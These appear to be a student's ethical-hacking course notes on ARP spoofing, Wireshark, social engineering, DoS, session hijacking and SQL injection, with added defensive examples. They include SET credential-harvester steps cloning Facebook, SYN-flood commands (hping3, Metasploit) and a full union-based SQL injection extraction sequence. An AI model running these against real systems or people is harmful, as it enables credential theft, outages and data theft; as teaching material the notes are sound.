 If a value is present, Windows will use it as the MAC address; if not, Windows will use the hard-coded manufacturer-provided MAC address. Some network adapter drivers have this facility built in.
 It can be found in the Advanced settings tab of the network adapter's device properties in Windows Device Manager.


ARP spoofing and ARP cache poisoning [[ arp spoofing image]]
ARP explained
IP to MAC
poison the gateway and the victim both
ARP attack tool: ettercap
countermeasures: XArp

Alice's ARP cache :
ip | mac
10.0.0.1 | cc:cc:cc:cc:cc...


Bob's ARP cache :
ip | mac
10.0.0.7 | cc:cc:cc:cc:cc


ARP : Address Resolution Protocol
example ARP table : run the arp command and press Enter
ARP spoofing : image example

simply broken down for explanation :
{{
 3 machines required
 1, 2, 3
 1 → Windows
 3 → Ubuntu
 2 → attacker
 2 will tell 1 "I am 3" [ send me all the traffic destined for 3 ]
 2 will tell 3 "I am 1" [ send me all the traffic destined for 1 ]
 }}
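The countermeasure side of the walkthrough above, as an added example (not XArp's or ettercap's code): a small ARP-reply monitor that keeps the IP-to-MAC bindings it has seen and flags the two symptoms of the poisoning described, a binding that changes and one MAC answering for both machine 1 and machine 3. The replies are constructed sample data.

```python
"""Added example (not from these notes): a minimal ARP-reply monitor in the
spirit of XArp. It keeps the IP -> MAC bindings it has seen and flags the two
symptoms of the poisoning walkthrough above: a binding that changes, and one
MAC answering for more than one IP (the attacker claiming both 1 and 3)."""
from collections import defaultdict

# Constructed sample ARP replies as (seconds, sender_ip, sender_mac).
# Hosts 1 (10.0.0.1) and 3 (10.0.0.7) answer first; at t=30 host 2
# (cc:cc:cc:cc:cc:cc) claims both addresses.
SAMPLE_REPLIES = [
    (0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    (1, "10.0.0.7", "bb:bb:bb:bb:bb:07"),
    (30, "10.0.0.1", "cc:cc:cc:cc:cc:cc"),
    (30, "10.0.0.7", "cc:cc:cc:cc:cc:cc"),
]


def detect_arp_poisoning(replies):
    """Return a list of alert strings, in the order the evidence appeared."""
    bindings = {}                # ip -> mac first learned for it
    claimed = defaultdict(set)   # mac -> ips it has answered for
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        known = bindings.get(ip)
        if known is None:
            bindings[ip] = mac
        elif known != mac:
            # A legitimate DHCP re-lease can also do this, so treat it as a
            # lead to verify (e.g. against a static gateway entry), not proof.
            alerts.append(f"t={ts}s: {ip} moved from {known} to {mac}")
        claimed[mac].add(ip)
        if len(claimed[mac]) == 2:   # alert once, when a MAC claims a 2nd IP
            alerts.append(f"t={ts}s: {mac} answers for {sorted(claimed[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_poisoning(SAMPLE_REPLIES):
        print(line)
```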


Sniffing Tools

Wireshark - GUI
tcpdump - CLI
-----------------------------------------------------------------------------
Wireshark
Wireshark is a free application that allows you to capture and view the data traveling back and forth on your network, providing the ability to drill down and read the contents of each packet – filtered to meet your specific needs.

It is an open-source protocol analyzer.

Originally known as Ethereal, Wireshark features a user-friendly interface that can display data from hundreds of different protocols on all major network types.

-----------------------------------------------------------------------------

Download : https://www.wireshark.org/download.html

#wireshark
capture --> select interface --> eth0
click on the shark-fin button in the top toolbar to start capturing

Packet List :
==============

Time: The timestamp of when the packet was captured is displayed in this column.

Source: This column contains the address (IP or other) where the packet originated.

Destination: This column contains the address that the packet is being sent to.

Protocol: The packet's protocol name (e.g., TCP) can be found in this column.

Length: The packet length, in bytes, is displayed in this column.

Info: Additional details about the packet are presented here. The contents of this column can vary greatly depending on packet contents.

---------------------
Filters:
========
 || means OR --> any one condition true
 && means AND --> both conditions true
Filtering on the basis of IP

ip.addr == IPADDRESS

For filtering a particular "source"
1. ip.src == 192.168.43.43

For filtering a particular "protocol"
2. dns

Using multiple filters
3. dns && ip.src == 192.168.43.1

Filtering a particular destination
4. ip.dst == 192.168.43.43

Filtering multiple sources (both conditions should be true)
5. ip.src == 192.168.43.43 && ip.src == 192.168.43.1
 (a packet has only one source address, so this one can never match; it is shown to contrast with || below)

Filtering multiple sources (any condition should be true)
6. ip.src == 192.168.43.43 || ip.src == 192.168.43.1

Either this address in source or destination
7. ip.addr == 192.168.43.43

Not condition (don't want to view this source)
8. !(ip.src == 192.168.43.43)

Multiple filters, both of which must be true since they are joined with &&
9. ip.src == 192.168.43.43 && !(ip.dst == 192.168.43.1)

For filtering packets on the basis of the data they contain
10. tcp contains "demo.testfire.net"
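To see exactly which packets each of the filters above keeps, here is a toy display-filter evaluator as an added example. It is not Wireshark's own engine and supports only what these notes use (ip.src / ip.dst / ip.addr with ==, bare protocol names, contains, !, &&, || and parentheses); the packets are constructed, not a real capture.

```python
"""Added example (not Wireshark's own engine): a toy evaluator for the display
filters listed above, so you can see exactly which packets each one keeps.
It supports only what the notes use: ip.src / ip.dst / ip.addr with ==, bare
protocol names, '<proto> contains "text"', !, &&, || and parentheses."""
import re

# Constructed packets, not a real capture. 203.0.113.10 is a documentation
# address standing in for the web server's IP.
PACKETS = [
    {"src": "192.168.43.43", "dst": "192.168.43.1", "protocols": {"udp", "dns"},
     "payload": "demo.testfire.net"},                       # 0: DNS query
    {"src": "192.168.43.1", "dst": "192.168.43.43", "protocols": {"udp", "dns"},
     "payload": "demo.testfire.net 203.0.113.10"},          # 1: DNS answer
    {"src": "192.168.43.43", "dst": "203.0.113.10", "protocols": {"tcp", "http"},
     "payload": "GET / HTTP/1.1 Host: demo.testfire.net"},  # 2: HTTP request
    {"src": "192.168.43.50", "dst": "192.168.43.1", "protocols": {"tcp"},
     "payload": ""},                                        # 3: other host
]

TOKEN_RE = re.compile(r'\|\||&&|==|!|\(|\)|"[^"]*"|[^\s()!&|="]+')


def make_protocol(name):
    return lambda p: name in p["protocols"]


def make_comparison(field, op, value):
    if op == "contains":        # substring search in that protocol's bytes
        return lambda p: field in p["protocols"] and value in p["payload"]
    if field == "ip.addr":      # matches either direction
        return lambda p: value in (p["src"], p["dst"])
    if field in ("ip.src", "ip.dst"):
        key = field.split(".")[1]
        return lambda p: p[key] == value
    raise ValueError(f"unsupported field {field!r}")


class FilterParser:
    """Recursive descent with Wireshark's precedence: ! binds tighter than
    &&, which binds tighter than ||. Produces a packet -> bool predicate."""

    def __init__(self, text):
        self.toks = TOKEN_RE.findall(text)
        self.pos = 0

    def peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else None

    def take(self, expected=None):
        tok = self.peek()
        if tok is None or (expected is not None and tok != expected):
            raise ValueError(f"expected {expected!r}, got {tok!r}")
        self.pos += 1
        return tok

    def parse(self):
        node = self.parse_or()
        if self.peek() is not None:
            raise ValueError(f"unexpected token {self.peek()!r}")
        return node

    def parse_or(self):
        left = self.parse_and()
        while self.peek() == "||":
            self.take()
            left = (lambda l, r: lambda p: l(p) or r(p))(left, self.parse_and())
        return left

    def parse_and(self):
        left = self.parse_not()
        while self.peek() == "&&":
            self.take()
            left = (lambda l, r: lambda p: l(p) and r(p))(left, self.parse_not())
        return left

    def parse_not(self):
        if self.peek() == "!":
            self.take()
            inner = self.parse_not()
            return lambda p: not inner(p)
        return self.parse_atom()

    def parse_atom(self):
        tok = self.take()
        if tok == "(":
            node = self.parse_or()
            self.take(")")
            return node
        if self.peek() in ("==", "contains"):
            op = self.take()
            return make_comparison(tok, op, self.take().strip('"'))
        return make_protocol(tok)


def apply_filter(text, packets=PACKETS):
    """Return the indices of the packets a display filter keeps."""
    keep = FilterParser(text).parse()
    return [i for i, p in enumerate(packets) if keep(p)]
```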



SOCIAL ENGINEERING


Social Engineering

it is all about the psychological manipulation of a person.

typical flow : gather info --> establish a relationship --> exploit that relationship

Targets : everyone
in a business environment:
--> small organisations, because they don't have security policies in place and single people handle multiple roles
--> government organisations
--> executives

private individuals : elderly, inexperienced users, young users, lower-income individuals.

can be computer-based or human-based attacks
phishing : sending fake emails
[[ref image ]]

pharming : setting up a fake, similar-looking website/webpage
A web page created to deceive visitors into believing that it is another company's web page.
For example, a user may create a web page that appears to be for a specific bank, requesting a username and password for login.

whaling : catching the big fish - C-suite people
 directly targets senior or other important individuals at an organization, with the aim of stealing money or sensitive information or gaining access to their computer systems for criminal purposes
[ref image ]

Snapchat example :
Snapchat hands over payroll information

Snapchat is no stranger to cyberattacks, but in 2016 the social media platform yet again found itself at the center of a data breach when an employee was tricked into releasing payroll information
 about some of its employees. In the attack, a member of the payroll team received an email from someone claiming to be Snapchat CEO Evan Spiegel,
who made a request for employee payroll information. The data was duly handed over to the attacker and the information was leaked shortly after.

news link : https://www.theguardian.com/technology/2016/feb/29/snapchat-leaks-employee-data-ceo-scam-email

vishing : making a fake phone call

example : https://www.youtube.com/watch?v=BEHl2lAuWCk

human-based attacks :
impersonation, tailgating, dumpster diving, shoulder surfing

tailgating : https://www.youtube.com/watch?v=Mr1nT0_n_FM
[[ref.dumpster diving image ]]

Pentesting Social Engineering:
define the scope of testing --> develop a plan --> obtain permission from senior management -->
can use attachments in emails / phishing emails / tailgating / dumpster diving



Pharming/phishing example through SET



SET
-------------
delivery of the URL is not covered in this demo
#setoolkit
>1 for social engineering attacks
>2 for website attack vectors
>3 for credential harvester attack method
>2 for site cloner [ will go out and copy and clone the website as it is ]
it asks for the IP address
where you want the stolen credentials to go / be sent to .. here you have to enter the attacker's IP (public/private); by default it shows your Kali IP address .. you can confirm it with ifconfig
enter the URL to clone : https://facebook.com

wait
enter the attacker IP in the victim's browser
and enter creds

and it redirects to the real Facebook page


[port forwarding / ngrok / noip for WAN ]


DOS_DDOS


DOS : Denial of Service
what ?
 a purposeful attack on a network or a resource to prevent legitimate access.
creating congestion on a link
flooding with bogus requests.
system / link / server being overloaded with requests --> resulting in the server getting overwhelmed
resulting in denial of service to legitimate traffic
a person with malicious intent could also send a specifically crafted command to the application designed to make it crash, effectively resulting in a denial of service.
unavailability of a service that's normally available
DOS : originates from a single source
[[ref. dos image ]]

DDOS : Distributed DOS
originates from a network of many sources, often many thousands. In simple terms, the best way to define a DDoS attack is that it's a DoS attack originating from many different distributed attack sources (IP addresses).
does much more harm than a simple denial of service attack, because it involves far more attack sources

Botnet: machines on the internet that are compromised and controlled from a control centre
 n/w of compromised hosts ---> executes commands on the order of a command and control (C&C) centre

Effects :
financial loss
loss of customers
n/w disabled
organisation disabled

Techniques :
SYN flooding
service request flood
ICMP flooding

SYN flood: sending TCP SYN segments to open ports
 server replies with SYN/ACK to the spoofed source
 a half-open connection is created for each SYN and the backlog soon maxes out
 as a result the server cannot accept any more new connections
server overwhelmed, legitimate traffic dropped, because the server allocates resources for each half-open connection and they are exhausted after a certain limit
[[ref syn flooding image ]]

Service Request Flood
valid sources: create many open connections to a service
the full handshake happens
can be intentional or unintentional
goal is to exhaust the server's resources.
example: server overload during exam results

ICMP flooding / ping flood
many ICMP echo requests --> ICMP echo replies
spoofed source IP address.
resulting in overwhelming the target resource
[[ ref icmp flood img]]

Tools :
these tools are publicly available, but using them against systems you are not authorised to test is still illegal
>loic : Low Orbit Ion Cannon : a n/w stress test app
>hulk : HTTP Unbearable Load King
>xoic : xoicdoser
>tor's hammer : ability to use Tor to anonymise the source [demo included]
>php dos --> DDoS PHP script
>ddosim : layer 7 simulator
>golden eye : https://github.com/jseidl/GoldenEye
> metasploit for DoS [demo]

during a pentest contract you need to explicitly tell the client before doing a DoS, because critical infrastructure is at risk.

Detection
activity profiling
an abnormal bump in incoming data can be seen
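What "activity profiling" looks like in practice, as an added example (not from these notes or any product): it learns a baseline SYN rate from a constructed log of inbound TCP packets, then labels each later second as normal, a SYN flood (SYNs that never complete the handshake, as with spoofed sources) or a service request flood (full handshakes, just far too many). The thresholds are assumptions.

```python
"""Added example (not from these notes): activity profiling over a constructed
log of inbound TCP packets. It learns a baseline SYN rate, then labels each
later second as normal, a SYN flood (SYNs that never complete the handshake,
as with --rand-source) or a service request flood (full handshakes, just far
too many of them). Thresholds are assumptions."""
from collections import defaultdict

# Log records are (second, source_ip, tcpdump-style flags): "S" = SYN sent by
# the client, "." = the bare ACK that completes the 3-way handshake.


def constructed_log():
    log = []
    for sec in range(10):                     # 0-9: baseline, 3 clients/sec
        for c in range(3):
            ip = f"10.0.{sec}.{c}"
            log += [(sec, ip, "S"), (sec, ip, ".")]
    for sec in (10, 11):                      # 10-11: spoofed SYNs, no ACKs
        for c in range(200):
            log.append((sec, f"198.51.100.{c}", "S"))
    for sec in (12, 13):                      # 12-13: 60 real clients/sec
        for c in range(60):
            ip = f"10.9.{sec}.{c}"
            log += [(sec, ip, "S"), (sec, ip, ".")]
    for c in range(4):                        # 14: slightly busy but normal
        ip = f"10.0.14.{c}"
        log += [(14, ip, "S"), (14, ip, ".")]
    return log


def profile(log, baseline_seconds=10, multiplier=5):
    """Return (baseline SYNs/sec, {second: verdict}) for every second after
    the baseline window. A second is abnormal when its SYN count exceeds
    multiplier x baseline; the share of completed handshakes then separates
    a SYN flood from a service request flood."""
    per_sec = defaultdict(lambda: {"syn": 0, "sources": set(), "completed": set()})
    for sec, src, flags in log:
        b = per_sec[sec]
        if "S" in flags:
            b["syn"] += 1
            b["sources"].add(src)
        elif "." in flags:
            b["completed"].add(src)
    baseline = sum(per_sec[s]["syn"] for s in range(baseline_seconds)) / baseline_seconds
    verdicts = {}
    for sec in sorted(s for s in per_sec if s >= baseline_seconds):
        b = per_sec[sec]
        if b["syn"] <= baseline * multiplier:
            verdicts[sec] = "normal"
        elif len(b["completed"]) * 2 < b["syn"]:
            verdicts[sec] = (f"syn flood: {b['syn']} SYNs from "
                             f"{len(b['sources'])} sources, "
                             f"{len(b['completed'])} handshakes completed")
        else:
            verdicts[sec] = (f"service request flood: {b['syn']} full "
                             f"handshakes from {len(b['sources'])} sources")
    return baseline, verdicts


if __name__ == "__main__":
    base, result = profile(constructed_log())
    print(f"baseline: {base} SYN/s")
    for sec, verdict in result.items():
        print(f"t={sec}s: {verdict}")
```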

countermeasure strategies:
WAF : e.g. Cloudflare / Akamai
degrade: stop non-critical services
 let's say we were serving 10 services; keep only the critical ones up
shutdown: disable the services under attack
 accept the defeat, shut down everything, wait for it to pass.

deflect the attack using honeypots
honeypot : a system deployed to attract attackers
 logs and provides info about attackers - source and software

Tools for DDOS protection
DDoS Defend : https://www.dosarrest.com/
FortGuard DDoS Firewall : http://www.fortguard.com/
Anti DDoS Guardian : http://anti-ddos.net/
DefensePro : https://radware.com/
WanGuard : https://www.andrisoft.com/

---------------------------------------------------------------------------------------------------------------------------
Tor's Hammer
https://github.com/dotfighter/torshammer
git clone
./torshammer.py -t <$ip> -p <$target port> -r <threads>

python torshammer.py -t 192.12.3.12 -p 80

 -t target IP
 -p destination port no. [running an HTTP server]
 -r threads, default 256 if nothing is given
 -T to anonymise
---------------------------------------------------------------------------------------------------------------------------
hping3
 aka ping of death
hping3 -S -p 8080 -V <$targetip>
hping3 -S -p 8080 --flood -V <$targetip>
hping3 <$targetip> --flood
hping3 -c 40000 -d 128 -S -w 64 -p 8000 --flood --rand-source 192.168.1.14
 -c count of packets
 -d size of each packet
 -S SYN flag
 -P PSH flag
 -R RST flag
 -A ACK flag
 -U URG flag
 -F FIN flag
 -w TCP window size
 -p port
 --flood send packets as fast as possible
 --rand-source randomise the source address
 -1 --> ICMP mode
 -a spoof the source host
 -V verbose
---------------------------------------------------------------------------------------------------------------------------
metasploit for DoS

msfconsole
>use auxiliary/dos/tcp/synflood
>show options
>set rhost 10.10.32.12
>set rport 21
>set shost 10.12.23.2 [not required; spoofs the source address]
>set timeout 30000
>exploit

can see the performance graph in Task Manager





WEB APP BASICS



WEB ARCHITECTURE AND COMPONENTS
============================================

1. Domain Name : It is tough for a user to remember the IP address of a website, so websites are assigned a domain name such as google.com, facebook.com, etc.
 So in order to open or access the website one has to visit the domain name.

2. Web Hosting Space : The space which stores the webpages or scripts that run a website is known as hosting space. Eg. GoDaddy, BigRock
ICANN provides these hosting spaces to GoDaddy etc.

 web hosting --> hosting = home of the website; shared hosting / dedicated hosting
 we purchase the physical disk space on the server and the bandwidth (how much traffic can come in and go out), plus access to a UI-based control panel to manage your hosting (eg. cPanel)


3. Operating Systems : On which operating system we want to build or host our website. Eg. Linux, Windows
4. Server Type : Which type of server we are using to host our website; it handles the request and response of the application.
 Windows - IIS (Internet Information Services)
 Linux - Apache Tomcat

difference between OS and server {{{
Operating System:
An operating system is a set of programs that coordinates all the activities among computer hardware devices. It provides a means for users to communicate with the computer and other software.
Many of today's computers use Microsoft's Windows, the latest version of Windows, or Mac OS, Apple's operating system.
When a user starts a computer, portions of the operating system are copied into memory from the computer's hard disk. These parts of the operating system remain in memory while the computer is on.
Server:
A server controls access to the hardware, software, and other resources on a network and provides a centralized storage area for programs, data, and information.
Servers support from two to several thousand connected computers at the same time. People use personal computers or terminals to access data, information, and programs on a server.
A terminal is a device with a monitor, keyboard, and memory.

a little more simplified :
A server platform can provide features like:

1) unlimited user connections
2) use of large amounts of memory
3) can act as web server, database server, email server and other server-like roles
4) optimized for network, instead of local application execution
5) extended management
6) extended fault tolerance to avoid downtime
7) can hold a domain
8) expensive

A client platform can provide features like:

1) running client applications faster, like Office, Photoshop, games
2) easy access to web services, like email, browsing, searching
3) rich media services
4) easy to use for non-expert users
5) can work on a domain as a member (professional edition only - home edition cannot join a domain)
6) rich connectivity support (LAN, wireless, Bluetooth, etc)
7) cheaper than the server version

A server mainly exists to handle numerous desktops, which in itself makes the difference between them fairly clear.
The GUI of a desktop OS is much friendlier than that of a server OS, which makes it easier for the masses to use and adapt it to their daily life.
 On the other hand, a server OS is not meant for general users; only experts work on it.


A server is an OS which always responds to the requests of clients.
Clients are those which only send requests to the server.

}}}


5. Web Technology : The technology we use in building a website, like the programming languages, the plugins, various scripting languages etc.
To check what technology a site is using :
visit : builtwith.com, wappalyzer, whatweb (Linux CLI)

 1. Client Side Scripting Language : Used to develop the front-end application; the user only accesses the controls that language renders.
 Eg. HTML, Java etc.

 2. Server Side Scripting Language : These are the languages used for creating and maintaining the server-side logic and configuration of a website.
 Eg. PHP, ASP, JSP, Python etc.


6. Database : The database is the system which stores all the data of the web application we are hosting on a server. It is known as the backbone of the web application. This data could be anything, like usernames, passwords, messages, comments etc.
Everything the application persists is stored as records in the database.
Windows - MSSQL
Linux - MySQL


 S Q L
 Structured --> means uniform storage, in the form of tables
 Query --> the data stored in the tables can be retrieved through queries; a query could look like :
 Select * from <tablename>;
-------------------------------------------------------------------

Local Hosting
=============
Local Hosting is a setup in which we store and host a website and its database on our own "localhost" computer. This website can be hosted and accessed in a LAN or an intranet.
It can be accessed from the hosting computer in three ways:
1. 127.0.0.1/WEBSITE_NAME
2. localhost/WEBSITE_NAME
3. <private ip>/WEBSITE_NAME


LOCAL HOST SERVERS
==================
These are server applications which take our normal operating system and make it act like a server.

WINDOWS - WAMPP

W - WINDOWS
A - APACHE
M - MSSQL
P - PERL
P - PYTHON

LINUX - LAMMP

L - LINUX
A - APACHE
M - MYSQL
P - PERL
P - PYTHON

XAMPP - Cross Platform Server
X - Cross Platform
A - APACHE
M - MYSQL
P - PERL
P - PYTHON


Webservers

Market share of various web servers as per Netcraft
[ref. to graph ]: - https://news.netcraft.com/archives/category/web-server-survey/

hackers will go after the larger market share ---> more popular --> higher probability of attack
quick defensive tip : use lesser-known web servers

why attacked :
they are reachable via the internet
server attack vectors available :
 server
 web apps
 database
if compromised then the attacker may be able to gain access to user and admin accounts
some server vulnerabilities can be :
 server settings
 poor passwords
 application security holes
 no authentication
 unpatched servers
 misconfigured security settings
 unnecessary services running

all these may lead to :- {
 sensitive data
 access to user accounts
 defacement of the website --> changing the contents of the website
 launching secondary attacks
}






SESSION HIJACKING

session hijacking,

sometimes also known as cookie hijacking, is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access

how is a session created ?

session management attacks
token generation
prediction :- requires sniffing --> attempts to guess the next token

browser cookie-editor add-ons let you easily create, edit and delete a cookie for the current page.

what is a cookie ?
cookie ??
A cookie is a message given to a web browser by a web server. The browser stores the message in a text file. The message is then sent back to the server each time the browser requests a page from the server.
information is packaged into a cookie and sent to your browser, which stores it for later use.

used for tracking the user, personalization, session management
not a security risk until someone else gets access to them.

the session id is stored in the cookie ... once you log in a session id is generated and stored in the cookie ...
 cookies have a lifetime : it can be the lifetime of the browser, a certain amount of time, or persistent irrespective of whether the browser closes.


the web server only matches the session id
Wireshark / Burp Suite can be used to see the session id being sent back and forth
modify headers using
Cookies Manager+ Firefox plugin

Cookies have parameters that can be passed to them:

 The name of the cookie.
 The value of the cookie.
 The expiration date of the cookie: this determines how long the cookie will remain active in your browser.
 The path the cookie is valid for. Web pages outside of that path cannot use the cookie.
 The domain the cookie is valid for. This makes the cookie accessible to pages on any of the servers in a domain.
 The need for a secure connection: this indicates that the cookie can only be used under a secure server condition.

auth_token= 124124csnwn12412niniwen2

twitter auth token example :
https://packetstormsecurity.com/files/119773/twitter-cookie.txt


[[ ref. session hijacking image]]

cookie manager for Firefox:
 https://addons.mozilla.org/en-US/firefox/addon/a-cookie-manager/
cookie editor for Firefox:
 https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/
for Chrome :
 https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en

Cookies folder location in Windows 10/8/7

To see where Internet Explorer stores its cookies in Windows 10/8.1/8/7/Vista, open Explorer > Organize > Folder Options > Views > check 'Do not show hidden files and folders' and uncheck 'Hide protected OS files' > Apply > OK.

Now you will be able to see the two real locations of the Windows Cookies folders at the following addresses in Windows 7:
• C:\Users\username\AppData\Roaming\Microsoft\Windows\Cookies
• C:\Users\username\AppData\Roaming\Microsoft\Windows\Cookies\Low
In Windows 8 and Windows 8.1, the cookies are stored in this folder:
• C:\Users\username\AppData\Local\Microsoft\Windows\INetCookies
In Windows 10 you may open the Run box, type shell:cookies and hit Enter to open the Cookies folder. It is located here:
• C:\Users\username\AppData\Local\Microsoft\Windows\INetCookies

Prevent Session Hijacking
encrypt end to end : if the session id is encrypted in transit then a sniffing attacker would not be able to use it.
this puts additional load on the web server,
preventions implemented on the server side:
the session id should be regenerated every few minutes.
the session id should expire after a certain interval of time.


Login -- using browser -- JS runs in browser -- Facebook server -- authorized user -- session generated -- session id created (uid/sid/sess_id) -- saved in cookies -- client side --


HTTPS request -->

HTTPS reply + Set-Cookie <--

HTTPS request + cookies -->

Cookies -- small text files -- username/password not stored -- only the session id is stored; it can be encrypted or plain text

Cookie used to track a user who has authenticated

Server sends back the session cookie

Cookies are sent in an HTTP header or explicitly included in a hidden field
generated by the server, stored by the client


If the algorithm that creates new session ids is simple and predictable then the attacker can generate the next session id - the session id can be guessed if it is not properly randomized
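The server side of the flow above, as an added example (not Facebook's or any framework's code): it issues the session id from the OS CSPRNG so it cannot be predicted, sends it with the cookie parameters listed earlier (path, domain, expiry, Secure) plus HttpOnly, expires idle sessions and regenerates the id every few minutes as the prevention section recommends. The domain and the timings are assumptions.

```python
"""Added example (not Facebook's or any framework's code): the server side of
the login flow sketched above. It issues a session id from the OS CSPRNG so
it cannot be predicted, sends it with the cookie parameters listed earlier
(Path, Domain, expiry, Secure) plus HttpOnly, expires idle sessions and
regenerates the id periodically. The domain and the timings are assumptions."""
import secrets
import time
from http.cookies import SimpleCookie

SESSION_TTL = 15 * 60      # assumed: idle sessions die after 15 minutes
ROTATE_EVERY = 5 * 60      # assumed: a session id lives at most 5 minutes


class SessionStore:
    def __init__(self, clock=time.time):
        self.clock = clock     # injectable so the behaviour can be tested
        self.sessions = {}     # sid -> {"user", "created", "last_seen"}

    def create(self, user):
        sid = secrets.token_urlsafe(32)   # 256 random bits, never sequential
        now = self.clock()
        self.sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def validate(self, sid):
        """Return (user, sid_to_send_back) or (None, None).
        The returned sid differs from the input after a regeneration."""
        s = self.sessions.get(sid)
        if s is None:
            return None, None
        now = self.clock()
        if now - s["last_seen"] > SESSION_TTL:
            del self.sessions[sid]         # expired: a captured id is useless now
            return None, None
        s["last_seen"] = now
        if now - s["created"] >= ROTATE_EVERY:
            del self.sessions[sid]         # old id stops working immediately
            return s["user"], self.create(s["user"])
        return s["user"], sid


def session_cookie_header(sid, domain="example.com"):
    """Build the Set-Cookie line for the 'HTTPS reply + Set-Cookie' step."""
    c = SimpleCookie()
    c["sid"] = sid
    c["sid"]["path"] = "/"
    c["sid"]["domain"] = domain
    c["sid"]["max-age"] = SESSION_TTL   # expiry: the browser drops it afterwards
    c["sid"]["secure"] = True           # HTTPS only, so it cannot be sniffed
    c["sid"]["httponly"] = True         # page scripts cannot read it
    return c.output(header="").strip()


def sid_from_request(cookie_header):
    """Extract the session id from the 'HTTPS request + cookies' step."""
    c = SimpleCookie()
    c.load(cookie_header)
    return c["sid"].value if "sid" in c else None


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice")
    print(session_cookie_header(sid))
    print(store.validate(sid_from_request(f"theme=dark; sid={sid}")))
```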

{

sniffing the n/w and capturing the cookie in transit


DNS cache poisoning :- tricking the user into believing that you are facebook.com, so the cookie is then sent to you.


} - n/w based attacks - encrypted connections can avoid these attacks


What Is a CMS?
================

A Content Management System (CMS) is a system that allows you to manage information easily and effectively. The information could be anything, whether it's a simple article or a complex media management system.
It is a system for non-technical users that allows them to organize content easily and makes the process simple rather than hectic. In any web-based application, there are three basic operations

--> Add
--> Edit
--> Delete

Example: WordPress, Joomla, Drupal, Magento etc...






SQLI




SQL injection, what it is ? theory

https://www.w3schools.com/sql/sql_union.asp
user ---> web app ---> keywords / creds ---> web app ---> creds --> DB --> query the DB --> match against existing creds in DB --> if a match is found ---> access granted
input params ---> user inputs his creds --->
input params ---> malicious SQL query -->
DB -----> multiple tables ----> fetch data from tables

> By SQL injection, an attacker could bypass authentication, access, modify and delete data within a database.
In some cases, SQL injection can even be used to execute commands on the operating system, potentially allowing an attacker to escalate to more damaging attacks inside of a network
that sits behind a firewall.

types of SQL injection

boolean-based injection

select city, country from customers;
       ^ column names        ^ table name

sample query to understand the behind-the-scenes working :
>>>> Executed SQL query when the username is tom and the password is jerry:

SELECT * FROM users WHERE name='tom' and password='jerry'
              ^ table name     ^ creds


explanation
When a user enters a user name and password, a SQL query is created and executed against the database to verify them.
The above query searches the users table for a row where name is tom and password is jerry. If a matching entry is found, the user is authenticated.

and means both conditions need to be true

using : ' or 1='1
 ' or '1'='1

1=1 ---> true

' ' (the empty string supplied as the username)

 true or false ---> true
false or true ---> true
false or false ---> false
true or true --> true

SELECT * FROM users WHERE name='' or '1'='1' and password='jerry'
(note: AND binds tighter than OR, so with the payload in the username field alone the password check still applies; that is why the payload goes into both fields below, or a comment is used to cut the query short)

comment sequences :
-- -
--+

SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'

The SQL query is crafted in such a way that both username and password verifications are bypassed. The above statement actually queries for all the users in the database and thus bypasses the security.

another way [introducing a comment ]
1' or 1=1 -- - blah
SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'
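The login query above built two ways, as an added example (not from these notes): string concatenation, which lets the payloads shown above change the query's logic, beside the parameterised form that keeps them as data. It runs against an in-memory SQLite table with constructed rows.

```python
"""Added example (not from these notes): the login query from above built two
ways against an in-memory SQLite table with constructed rows. The first
concatenates user input into the SQL text, as the notes' query does, so the
' or '1'='1 and comment payloads shown above change the query's logic; the
second passes the values as bound parameters, so they stay data."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("tom", "jerry"), ("alice", "s3cret")])
    return conn


def login_vulnerable(conn, name, password):
    """String concatenation: whatever the user types becomes SQL.
    Returns the name of the first matching row, or None."""
    query = (f"SELECT * FROM users WHERE name='{name}' "
             f"and password='{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, name, password):
    """Parameterised query: the driver binds the values separately, so a
    quote or a -- inside them is never parsed as SQL."""
    row = conn.execute("SELECT * FROM users WHERE name=? and password=?",
                       (name, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print("vulnerable, both fields injected:", login_vulnerable(db, payload, payload))
    print("safe, both fields injected:      ", login_safe(db, payload, payload))
```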



SELECT * FROM users WHERE name= (' tom ') and blafalmglwgw
> SQL injection cheat sheet and kinds

https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/



Union-based injection...
step by step execution

demo website : http://testphp.vulnweb.com/artists.php?artist=1
categories --> posters / paintings


1. first find a GET parameter: get something=something
ex: php?id=0/1
php?cat=1

2. exception handling: use a ' quote to check whether the link is vulnerable or not

3. use the 'order by' clause to find the number of columns in the query
ex: php?cat=1 order by 99--+
if there is an error, that many columns do not exist
if there is no error and data is returned, that column is present
order by 12 --+

we got to know there are 11 columns


4. union to display the column positions
ex: php?cat=-1 union select 1,2,3,....--+ (one number for each column must be present)
ex: if there are 99 columns then you have to type up to ....97,98,99--+

http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20--+
 ^ using -1 makes the original query return no row, so the row produced by the union is the one displayed
we get the vulnerable (displayed) columns


inject your query there
2,9,7,11


5. find database and version


database() = acuart
version() = 5.1.73-0ubuntu0.10.04.1


information_schema = "information ki maa" = the mother of all information


6. find tables
ex: php?cat=-1 union select 1,2,3,4,5,6,table_name,8,9,10,11 FROM information_schema.tables WHERE table_schema=database()--+


table names = users, categ, products, artists, ^

database = acuart ---> tables (12rwwfwfwfwefw) ----> users table -----> ( cc, address, uname, pass, phone, )


7. find columns
ex: php?cat=-1 union select 1,2,3,4,5,6,column_name,8,9,10,11 FROM information_schema.columns where table_name='users'--+

8. extract data

ex: php?cat=-1 union select 1,2,3,4,5,6,pass,8,9,10,uname from users--+






CRYPTO

